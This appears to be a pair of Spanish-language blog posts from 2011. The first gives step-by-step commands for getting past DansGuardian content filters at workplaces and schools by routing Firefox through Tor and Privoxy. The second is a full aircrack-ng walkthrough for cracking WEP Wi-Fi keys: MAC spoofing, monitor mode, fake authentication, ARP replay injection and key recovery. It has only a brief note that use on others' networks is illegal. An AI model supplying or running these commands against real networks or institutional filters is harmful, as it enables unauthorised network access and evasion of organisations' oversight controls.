20.5.11

como saltar el dans guardian en linux





En muchas empresas y centros educativos está a la orden del día instalar proxies y filtros de contenidos  para impedir que los usuarios accedan a ciertas páginas como por ejemplo Tuenti, Facebook, páginas de juegos, etc.
¿Podemos evitar estos filtros? Sí. Vamos a ver como podemos saltarnos los filtros paso a paso.
  1. Abrimos un Terminal (Aplicaciones > Accesorios > Terminal).
  2. Actualizamos la información de los repositorios (es conveniente antes de instalar cualquier programa) ejecutando el siguiente comando:
    sudo aptitude update
  3. Instalamos las herramientas necesarias: tor, torbutton-extension y privoxy.
    sudo aptitude install tor torbutton-extension privoxy
  4. Editamos el archivo de configuración de privoxy para que se pueda comunicar con tor:
    sudo nano /etc/privoxy/config
    Añadimos las siguientes líneas, sin que se nos olviden los puntos del final, en cualquier parte del fichero aunque su sitio sería justo encima del punto 5.3:
    forward-socks4a /       127.0.0.1:9050 .
    forward 192.168.*.*/     .
    Para guardar el archivo pulsamos la combinación de teclas CTRL+O y para salir CTRL+X.
    No te olvides cambiar la dirección de red privada 192.168.*.* por la que tengas en tu red. Podría ser 172.16.*.* o incluso 10.*.*.*.
    Editando el archivo /etc/privoxy/config
    Editamos el archivo /etc/privoxy/config
  5. Reiniciamos privoxy
    sudo /etc/init.d/privoxy restart
  6. Reiniciamos tor:
    sudo /etc/init.d/tor restart
  7. Comprobamos que está funcionando privoxy correctamente ejecutando el siguiente comando:
    netstat -a | grep 9050
    Y debemos obtener algo así:

    Ejecutamos netstat -a | grep 9050
    Ejecutamos netstat -a | grep 9050
  8. Cerramos todas las ventanas de Firefox y lo abrimos de nuevo. Y ya podemos activar y desactivar Tor para navegar anónimamente desde el botón de la parte inferior derecha de Firefox.

17.2.11

como manejar aircrack-ng capturador de paquetes wifi






este proceso a una red ajena a la propia es ILEGAL. Prueba con tu red y verás que fácil es de vulnerar.



para descargar aircrack-ng:
http://descargar.benjaminstrahs.com/d-d-view-a9g81/AIRCRACK-NG/es.htm
tienen que  abrir una terminal(consola) y poner  sudo apt-get install aircrack-ng
tambien deveran descargar macchanger:
tienen que  abrir una terminal(consola) y poner  sudo apt-get install macchanger
http://alexisleiva.com/wordpress/?tag=mac-changer
despues sigan estos pasos:



Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org.
Primero abrimos una terminal (consola) y entramos como superusuario(root) para tener privilegios. Este comando varía según la distribución GNU/Linux que usemos.
sudo su
*** Preparación de la tarjeta
airmon-ng
>>interfaz inalámbrico: nos devuelve por pantalla el nombre de la tarjeta red que tenemos (wifi0, wlan0, ath0, ra0,…). Yo usaré ra0 por tener una ralink 2500.
airmon-ng stop ra0
>>monitor mode disable: nos devuelve que nuestra tarjeta tiene el modo monitor desactivado.
ifconfig ra0 down
>>tarjeta de red desactiva: no sale nada por pantalla.
macchanger –mac 00:11:22:33:44:55 ra0
>>Current mac: xx:xx:xx:xx:xx:xx    Fake mac:00:11:22:33:44:55: nos da la mac original y la falsa que hemos nos hemos asignado para luego poder inyectar paquetes.
airmon-ng start ra0
>>monitor mode enable: Ponemos nuestra tarjeta en modo monitor(necesario para poder capturar paquetes)
*** Escaneo de redes y clientes asociados
airodump-ng ra0
>>redes y clientes disponibles: nos sale una tabla con las redes disponibles con toda la información como canal, nombre, calidad de señal, tipo de encriptación, etc.. y los clientes que están conectadas a las redes. Así que elegimos una que tenga buena señal (que vaya capturando #data y tenga buen PWR) apuntamos la BSSID, el numero de canal (CHANNEL). Paramos la ejecución del comando pulsando “Control+C”, o cerrando y abriendo otra terminal.
airodump-ng –c NumeroDeCanal –w ArchivoDeCapturas –bssid BBSID ra0
Por ejemplo una red en canal 11 con BSSID 00:01:02:03:04:C1 que hemos detectado:   airodump-ng -c 11 -w capturaswifi  – - bssid 00:01:02:03:04:C1
>>Capturando paquetes…: nos va saliendo la captura de paquetes así como la señal de la red y los clientes asociados. Dejamos recogiendo paquetes, por lo que ESTA TERMINAL NO LA CIERRES!!!
*** Inyección de paquetes para agilizar el proceso de capturas de paquetes
Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes.
aireplay-ng -1 0 –a BSSID –h 00:11:22:33:44:55 –e ESSID ra0
>>Association successful: Con esto hacemos una autenticación falsa en el router. Para ello en el comando se necesita la BSSID de la red atacada, la mac falsa que nos pusimos (00:11:22:33:44:55) y el nombre que tiene la red atacada, es decir, la ESSID.  Es importante que nos salga el Association Succesful, de lo contrario no podremos inyectar paquetes. Por ejemplo: aireplay-ng 1 0 -a 00:01:02:03:04:05 -h 00:11:22:33:44:55 -e WIFI_RED ra0.
aireplay-ng -3 –b BSID –h 00:11:22:33:44:55  ra0
>>Envío de paquetes…: nos saldrá por pantalla que se están mandando paquetes, para que la inyección sea correcta deben aparecer paquetes ARP recogidos. Por ejemplo: aireplay-ng -3 -b 00:01:02:03:04:05 -h 00:11:22:33:44:55  ra0. Ahora dejamos que siga inyectando paquetes, por tanto NO CIERRES ESTA TERMINAL!!!
*** Crackeo WEP
Para poder obtener la clave WEP es necesario tener un mínimo de paquetes recogidos. El número de paquetes dependerá de la longitud que tenga la clave WEP. Como mínimo recomiendo que empecéis a intentar conseguir la clave a partir de 25.000 por si la clave es de las cortas.
Cuando veamos en la terminal que dejamos el airodump-ng recogiendo paquetes que tenemos más de 25.000 #data recogidos.
Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes.
aircrack-ng –b BSSID ArchivoDeCapturas.cap
>>Clave WEP encontrada/no encontrada: El programa empezará a descifrar los paquetes recogidos, y cuando finalice nos dirá si ha encontrado la clave o no. Si no la encuentra nos recomienda que lo volvamos a intentar superados “X” paquetes recogidos. Si la encuentra nos saldrá: KEY FOUND! y la clave en hexadecimal normalmente.
Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org.
Con todo ésto podemos ver lo fácil que es vulnerar un red con clave WEP. Por tanto toma medidas!!! La encriptación WEP no es segura!!!

11.2.11